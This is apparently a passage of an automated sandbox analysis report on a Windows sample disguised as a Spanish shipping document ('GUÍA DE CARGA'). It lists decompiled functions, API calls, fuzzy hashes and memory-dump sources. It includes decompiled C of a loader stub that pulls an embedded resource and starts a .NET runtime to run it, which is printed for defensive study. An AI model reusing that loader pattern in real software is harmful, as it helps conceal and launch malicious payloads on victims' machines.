                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharPrevlstrlen
                        • String ID: C:\Users\user\Desktop
                        • API String ID: 2709904686-1246513382
                        • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                        • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                        • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                        • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405813, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405813(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                        0x0040581f
                        0x00405821
                        0x00405849
                        0x0040582e
                        0x00405833
                        0x0040583e
                        0x00000000
                        0x0040585b
                        0x00405847
                        0x00405847
                        0x00000000

                        APIs
                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: lstrlen$CharNextlstrcmpi
                        • String ID:
                        • API String ID: 190613189-0
                        • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                        • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                        • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                        • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Analysis Process: GU#U00cdA DE CARGA...exe PID: 400 Parent PID: 2848 GU#U00cdA DE CARGA...exeCOMMON

                        Executed Functions

                        Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                        0x0040149f
                        0x004014a5
                        0x004014a9
                        0x004014ec
                        0x004014ee
                        0x004014ee
                        0x004014b7
                        0x004014bb
                        0x004014c7
                        0x004014cd
                        0x004014d3
                        0x004014d8
                        0x004014e0
                        0x004014e0
                        0x004014d8
                        0x004014e6
                        0x00000000

                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                        • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                        • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                        • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                        • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                          • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                        • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                        • ExitProcess.KERNEL32 ref: 004014EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                        • String ID: v4.0.30319
                        • API String ID: 2372384083-3152434051
                        • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                        • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                        • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                        • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FBE7F, Relevance: 2.1, APIs: 1, Instructions: 635libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 2ba0bc7b375915bc6327814246d3644b4435ded8b93e525f3abc6ace22098862
                        • Instruction ID: 50c349cc1232688426ceefe28e2b1370d562312065aec27b6861d6645f3aa465
                        • Opcode Fuzzy Hash: 2ba0bc7b375915bc6327814246d3644b4435ded8b93e525f3abc6ace22098862
                        • Instruction Fuzzy Hash: 0562E274E04228CFDB25DFA9C984BDDBBB2BB89304F1085AAD508A7355D730AE85CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05824588, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05824653
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 7f2524c8abbdbf782b7ae74d954936cbced8ca1ba2d60815610d85cfbbfad11b
                        • Instruction ID: 01a00a5f3a598b71e0333fd9ab8bea99fd4a648a4b917a8fc3763ef29d696538
                        • Opcode Fuzzy Hash: 7f2524c8abbdbf782b7ae74d954936cbced8ca1ba2d60815610d85cfbbfad11b
                        • Instruction Fuzzy Hash: 59C19174E00218CFDB54DFA5C984BADBBB2BF89304F2081A9D809A7365DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05822FA8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05823073
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 3fca207cf4f95b7766760578c01f0125cadfbf2995bb5eb2dfd9ad38259e4e3a
                        • Instruction ID: 81dc8591f033d7b553ddec0c66edd5cad0fb4117b0d605f0655e175ab8a2c80e
                        • Opcode Fuzzy Hash: 3fca207cf4f95b7766760578c01f0125cadfbf2995bb5eb2dfd9ad38259e4e3a
                        • Instruction Fuzzy Hash: 04C1B174E00218CFDB24DFA5D994B9DBBB2BF89304F2085A9D809AB354DB359E85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 058249E0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05824AAB
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: ab382f821b04253e1c05bc9d0b79fa8ceceed6d1662c130de807e83ce6d735b6
                        • Instruction ID: 1d0d29302f4d25dfcc282266d3f7d483c7b9181424661b625fd8683f79948fa9
                        • Opcode Fuzzy Hash: ab382f821b04253e1c05bc9d0b79fa8ceceed6d1662c130de807e83ce6d735b6
                        • Instruction Fuzzy Hash: 6FC19174E00218CFDB54DFA5D984BADBBB2BF89304F2081A9D809AB365DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05824130, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 058241FB
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 656d0a89db256836f52c9ebf9748ef562e24552a10f4bfbe5b0cac26814a7bb3
                        • Instruction ID: 9e89c586a46cc97891521f5732e24432e1e3c8fe192eacbb22e4e4933c72962f
                        • Opcode Fuzzy Hash: 656d0a89db256836f52c9ebf9748ef562e24552a10f4bfbe5b0cac26814a7bb3
                        • Instruction Fuzzy Hash: 2EC19174E00218CFDB64DFA5D984B9DBBB2AF89304F2081A9D809AB364DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05825B40, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05825C0B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 3210a0e059a122db685916a189fd0318ed209cd11677b19381e2c1ec2bc19ff6
                        • Instruction ID: 6ca2e034124f6786d8f989f919c017b6d19c43af2da18f3a7cde2874be8223de
                        • Opcode Fuzzy Hash: 3210a0e059a122db685916a189fd0318ed209cd11677b19381e2c1ec2bc19ff6
                        • Instruction Fuzzy Hash: B1C1A174E00218CFDB24DFA5D984BADBBB2BF89304F2081A9D809AB354DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05822B50, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05822C1B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 1e0c646f2429ec8b2c25605e8ab06b79863291b06635cc05301184435294f4ad
                        • Instruction ID: 722bcb93cdbb72989fef83b5ddef29a6819701f65e54bd56060b78ec6129fd55
                        • Opcode Fuzzy Hash: 1e0c646f2429ec8b2c25605e8ab06b79863291b06635cc05301184435294f4ad
                        • Instruction Fuzzy Hash: 14C19074E00218CFDB64DFA5D984BADBBB2BF89304F2081A9D809AB355DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05825290, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0582535B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 203e15db71347eff06e0075917e73e78a252a34caca4166e1c4f3ff4fa315ae9
                        • Instruction ID: 402daa0fcc472cce20276fb837933ed5499d05feb985580681e2a315f61a7db7
                        • Opcode Fuzzy Hash: 203e15db71347eff06e0075917e73e78a252a34caca4166e1c4f3ff4fa315ae9
                        • Instruction Fuzzy Hash: F8C1A174E00218CFDB64DFA5D984B9DBBB2BF89304F2081A9D809AB354DB359D85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 058222A0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0582236B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 85c7b8142a54ab49384c63fd11a88c336d34a5c1e08df069e12419f5d765e214
                        • Instruction ID: 2d0d43e6c1b8c825d43bbcc4cca56d32a99bfb9d504a5cf2b2274a724844050a
                        • Opcode Fuzzy Hash: 85c7b8142a54ab49384c63fd11a88c336d34a5c1e08df069e12419f5d765e214
                        • Instruction Fuzzy Hash: F6C19074E00218CFDB64DFA5D994BADBBB2BF89304F2081A9D809AB354DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05823CD8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05823DA4
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 6407acbec20369bc54da699e2f13de49d142ccbedf4c34e7bfbb3eb55bce32b0
                        • Instruction ID: 0f492df4202970ffdddbd3c70789b5b8c13d045794e8b994aec905957ae4b5a0
                        • Opcode Fuzzy Hash: 6407acbec20369bc54da699e2f13de49d142ccbedf4c34e7bfbb3eb55bce32b0
                        • Instruction Fuzzy Hash: 16C1B174E00218CFDB64DFA5D984BADBBB2BF89304F2081A9D809A7354DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 058256E8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 058257B3
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: c04701f6a79eecfeffbb76e9c2476b193f4cdb1e866db75e16debbda4388f244
                        • Instruction ID: e3a913a14a9cbc716a371bcb06ddebde49e2c96a579641f7fbf23f389258408b
                        • Opcode Fuzzy Hash: c04701f6a79eecfeffbb76e9c2476b193f4cdb1e866db75e16debbda4388f244
                        • Instruction Fuzzy Hash: 78C1A074E00218CFDB64DFA5D984BADBBB2BF89304F2081A9D809AB354DB359D85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 058226F8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 058227C3
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 1037fd3cb8bcb8793b8bb20eee6110ed3be3b0ca367187dcebcdd3aac5639686
                        • Instruction ID: 37741e6f2294b6422bb7359727e874a1c6b098cdce16d7ab80693cda462933c0
                        • Opcode Fuzzy Hash: 1037fd3cb8bcb8793b8bb20eee6110ed3be3b0ca367187dcebcdd3aac5639686
                        • Instruction Fuzzy Hash: 38C1A174E00228CFDB64DFA5D984B9DBBB2BF89304F1081A9D809A7355DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05823400, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 058234CB
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 395885e377ecb9a157fd4e9342e2aa636195a9173da15a4bca2e5aa4a6465325
                        • Instruction ID: 45b5270a49962af827552a206bc2085f74dd991a49f700c1d34421be9e5bbb8b
                        • Opcode Fuzzy Hash: 395885e377ecb9a157fd4e9342e2aa636195a9173da15a4bca2e5aa4a6465325
                        • Instruction Fuzzy Hash: E0C1A174E01218CFDB24DFA5C994BADBBB2BF89304F2085A9D809AB354DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05821E20, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05821EEB
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 3c705987027eb5f060a825710f10eb00387a7bfc77a8c6f0b1478128e256cde4
                        • Instruction ID: 014d7320e836741e319f511b65c3e3074beecc624fd60543e895d3a9f1a9e789
                        • Opcode Fuzzy Hash: 3c705987027eb5f060a825710f10eb00387a7bfc77a8c6f0b1478128e256cde4
                        • Instruction Fuzzy Hash: C2C19174E00218CFDB64DFA5D984BADBBB2BF89304F2081A9D809A7355DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05824E38, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05824F03
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 462d9464e95c0f818a14866b3e774f8a8935349d57975b19f12c92db7848d50c
                        • Instruction ID: 33ad8201e65d2c593efd9a3dbc4f94da0b067e58f6a33dd2eca734a622761667
                        • Opcode Fuzzy Hash: 462d9464e95c0f818a14866b3e774f8a8935349d57975b19f12c92db7848d50c
                        • Instruction Fuzzy Hash: CEC19074E00218CFDB64DFA5D984BADBBB2BF89304F2081A9D809AB355DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05823858, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05823923
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 89d381423a774f948a2af0c1bd7a6fe9041d4eee8349a3f426076d4b7a566104
                        • Instruction ID: 5cdf4cdd6bcb404a8efa6fcbbc7534425f900f7d16f3d3467b6a8030211c0022
                        • Opcode Fuzzy Hash: 89d381423a774f948a2af0c1bd7a6fe9041d4eee8349a3f426076d4b7a566104
                        • Instruction Fuzzy Hash: 0CC1A174E00218CFDB54DFA5C994BADBBB2BF89304F2085A9D809AB355DB359E85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05808390, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580845B
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 8f4098d1cd1c75326311abac7eb2f7a5d44f38a84e9601b46f7b02745f21a38b
                        • Instruction ID: b5784ec715b6d34e9ddc4c5d910c4d67fbeeb92fde3139fe02ffd59b4cdbd020
                        • Opcode Fuzzy Hash: 8f4098d1cd1c75326311abac7eb2f7a5d44f38a84e9601b46f7b02745f21a38b
                        • Instruction Fuzzy Hash: 5DC1A074E00218CFDB64DFA5C984BADBBB2BF89304F2081A9D809AB354DB359D85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05809098, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05809163
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: cb64b0ac6da72917fc0e15a66b004a5d0447866c412bdb51d036317f93544eb1
                        • Instruction ID: 332278d6de07db0c95fbe8f013092ff5fa7ba01d5341488ed073ea59645d4245
                        • Opcode Fuzzy Hash: cb64b0ac6da72917fc0e15a66b004a5d0447866c412bdb51d036317f93544eb1
                        • Instruction Fuzzy Hash: 8FC19074E00218CFDB64DFA5D984B9DBBB2BF89304F2090A9D809AB395DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05809DA0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05809E6B
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 99900f54869e1f2f24ac589894d7ddeb1bfc3f5605f86bb1acad9b563b1331b7
                        • Instruction ID: 5a31d545a9669c6292ab947bf258c25f8d1e2ca5030d0bb55c8b7543472a6320
                        • Opcode Fuzzy Hash: 99900f54869e1f2f24ac589894d7ddeb1bfc3f5605f86bb1acad9b563b1331b7
                        • Instruction Fuzzy Hash: E2C19074E00218CFDB64DFA5D984BADBBB2BF89304F2090A9D809AB355DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580AAA8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580AB73
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 9d68cdc3662fde204851f3f59e798bf07d2488c6af4db3d813c2cfecc323d3d3
                        • Instruction ID: 3a1e9ce7e9754067a84cc25c0134eeb4f0a905e8b17abc92e96477e94c63d5e0
                        • Opcode Fuzzy Hash: 9d68cdc3662fde204851f3f59e798bf07d2488c6af4db3d813c2cfecc323d3d3
                        • Instruction Fuzzy Hash: 79C1A174E01218CFDB64DFA5C994B9DBBB2BF89304F1090A9D809A7395DB359D85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580B7B0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580B87B
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: fae7ef8b22ec9ec88a3afb8cfc626233ae43e131c9b9a26ec5d8f994d2d2ff9c
                        • Instruction ID: 6ea77c8f880700fe31009524f65e8f7d0699cbf516ae80954b4c04051225435c
                        • Opcode Fuzzy Hash: fae7ef8b22ec9ec88a3afb8cfc626233ae43e131c9b9a26ec5d8f994d2d2ff9c
                        • Instruction Fuzzy Hash: 2DC1A174E00218CFDB64DFA5C994B9DBBB2BF89304F2090A9D809AB354DB359D85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580C4B8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580C583
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 5e35b8f6c681a0094f4db8361005a61f55b90d441d82ddb3244c362d7de49edc
                        • Instruction ID: 0f09573e8837ce13c485a83358755a1335e303387bec6da3694c63c789e6c11f
                        • Opcode Fuzzy Hash: 5e35b8f6c681a0094f4db8361005a61f55b90d441d82ddb3244c362d7de49edc
                        • Instruction Fuzzy Hash: 33C1A074E00218CFDB64DFA5C984BADBBB2BF89304F2091A9D809AB355DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580D1C0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580D28B
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 070b8696c8ff409e1e3dc8ea088c9bfc4b4cb78c2757b2d99e203f0c096daf59
                        • Instruction ID: 13edb1356f9b2ec1f25b46cee5c1aa6edcb71639d44ac95ce09fdaa153acfd88
                        • Opcode Fuzzy Hash: 070b8696c8ff409e1e3dc8ea088c9bfc4b4cb78c2757b2d99e203f0c096daf59
                        • Instruction Fuzzy Hash: E6C1A174E01218CFDB54DFA5C984B9DBBB2BF89304F2090A9D809AB354DB35AD85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 058087E8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 058088B3
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 9451f07c62e94f913ae415e25fa1db33c9bcef9e137bb115dfe52588e022ac7d
                        • Instruction ID: 640300ec543eec23369b663f919a19796c8aaf916bf46c31cfe083ecb38d0cf2
                        • Opcode Fuzzy Hash: 9451f07c62e94f913ae415e25fa1db33c9bcef9e137bb115dfe52588e022ac7d
                        • Instruction Fuzzy Hash: 4BC1A174E00218CFDB64DFA5C994BADBBB2BF89304F2090A9D809AB355DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 058094F0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 058095BB
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
